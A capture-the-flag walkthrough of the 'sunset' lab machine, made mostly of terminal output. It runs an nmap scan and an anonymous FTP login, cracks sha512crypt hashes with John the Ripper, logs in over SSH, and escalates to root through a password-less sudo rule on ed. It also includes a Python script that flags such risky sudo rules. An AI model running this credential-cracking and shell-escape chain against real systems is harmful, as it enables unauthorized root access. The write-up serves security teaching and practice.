We start with an nmap scan of the remote host.
root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.104
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-19 11:47 MST
Nmap scan report for 192.168.56.104
Host is up (0.00046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root         1062 Jul 29 00:00 backup
| ftp-syst:
|   STAT:
| FTP server status:
|  Connected to: 192.168.56.104:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
|   2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
|   256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_  256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (EdDSA)
MAC Address: 08:00:27:13:81:5A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.27 seconds
root@ubuntu:~/src#
Nmap came back with two open ports, 21 (FTP) and 22 (SSH), and the ftp-anon script already reports that anonymous FTP login is allowed. Let's connect to the FTP service and see what we can find there.
root@ubuntu:~# ftp 192.168.56.104
Connected to 192.168.56.104.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.104:root): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r--   1 root     root         1062 Jul 29 00:00 backup
226 Transfer complete.
ftp>
There is a single downloadable file called 'backup'. Let's download it and see what it contains. After downloading the 'backup' file we cat its contents.
root@ubuntu:~/src# cat backup
CREDENTIALS:
office$6$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCravWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter$6$3QWJ4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky$6$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
root@ubuntu:~/src#
It looks like usernames and password hashes in the crypt(3) $6$ (sha512crypt) format. Let's fire up John the Ripper and start cracking. Note that John loads only two of the five entries: only the sunset and space lines have the well-formed user:$6$salt$hash layout, while the other three are missing the colon and salt separator.
root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/sunset-hash.txt --format=sha512crypt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
space            (space)
cheer14          (sunset)
2g 0:00:00:13 DONE (2019-11-19 11:58) 0.1484g/s 1064p/s 1862c/s 1862C/s gerber..chanda
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run#
We cracked two of the hashes. Our next step is to try logging in over SSH with the recovered usernames and passwords.
root@ubuntu:~/src# ssh sunset@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ECDSA key fingerprint is SHA256:n9ATwmONo6fCyPblqlvcO7WcIWZJMqBaqDdo/jYnLPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.104' (ECDSA) to the list of known hosts.
sunset@192.168.56.104's password:
Linux sunset 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 28 20:52:38 2019 from 192.168.1.182
sunset@sunset:~$
We got a successful login as 'sunset' with the password 'cheer14'. Let's now check the user's sudo rights.
sunset@sunset:~$ sudo -l
Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
sunset@sunset:~$
We can run the ed editor as root with no password. Since ed can execute shell commands from inside the editor, we can of course break out into a shell by entering the command '! /bin/bash' at the ed prompt.
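The rule that makes this possible is the kind of thing a sudoers review should catch before an attacker does. The script below is an added example, not part of the original write-up or of sudo: it parses the text that sudo -l prints, extracts each (runas) tag: command rule, and flags rules that grant root without a password to either ALL commands or a program known to offer an in-editor command escape. The only program in that set here is ed, because that is the one this write-up demonstrates; the set name SHELL_ESCAPE_CAPABLE and the sample text are the example's own, with the sample reconstructed from the output above.

```python
import os
import re

# 'sudo -l' output for user sunset, reconstructed from the write-up (raw string so
# the backslash-escaped colons in secure_path survive untouched).
SUDO_L_OUTPUT = r"""Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
"""

# Programs that can run a shell command from within the program itself. Seeded
# with ed, the binary from this write-up; extend from your own policy (assumption:
# this set is the auditor's own and is not read from any tool).
SHELL_ESCAPE_CAPABLE = {"ed"}

# One rule line as printed by sudo -l: "(runas) [TAG: TAG: ...] cmd[, cmd ...]"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)+)?(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return the rules that follow 'may run the following commands' as dicts."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tag_text = m.group("tags") or ""
        tags = {t.strip() for t in tag_text.split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "command": cmd.strip()})
    return rules


def find_risky_rules(rules):
    """Flag rules that give root, with no password prompt, to ALL or to a shell-escape-capable program."""
    findings = []
    for r in rules:
        runas_user = r["runas"].split(":")[0].strip()  # "(root)" or "(ALL : ALL)" -> user part
        if runas_user not in ("root", "ALL") or "NOPASSWD" not in r["tags"]:
            continue
        if r["command"] == "ALL":
            findings.append((r["command"], "any command as root without a password"))
            continue
        binary = os.path.basename(r["command"].split()[0])
        if binary in SHELL_ESCAPE_CAPABLE:
            findings.append((r["command"], f"{binary} can spawn a shell, so this is an unrestricted root shell"))
    return findings


if __name__ == "__main__":
    for command, reason in find_risky_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"RISKY: {command}: {reason}")
```

A rule for the same binary that still requires a password is not flagged; it is a weaker finding and the check above is deliberately about the password-less case the write-up exploits. The fix on the box side is to remove the NOPASSWD tag or, better, to not expose an interactive editor through sudo at all.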
sunset@sunset:~$ sudo /usr/bin/ed
! /bin/bash
root@sunset:/home/sunset# id
uid=0(root) gid=0(root) groups=0(root)
root@sunset:/home/sunset# whoami
root
root@sunset:/home/sunset#
We broke out into a root shell; all that's left to do is cat the flag located in /root.
root@sunset:/home/sunset# cd /root
root@sunset:~# ls
flag.txt  ftp  server.sh
root@sunset:~# cat flag.txt
25d7ce0ee3cbf71efbac61f85d0c14fe
root@sunset:~#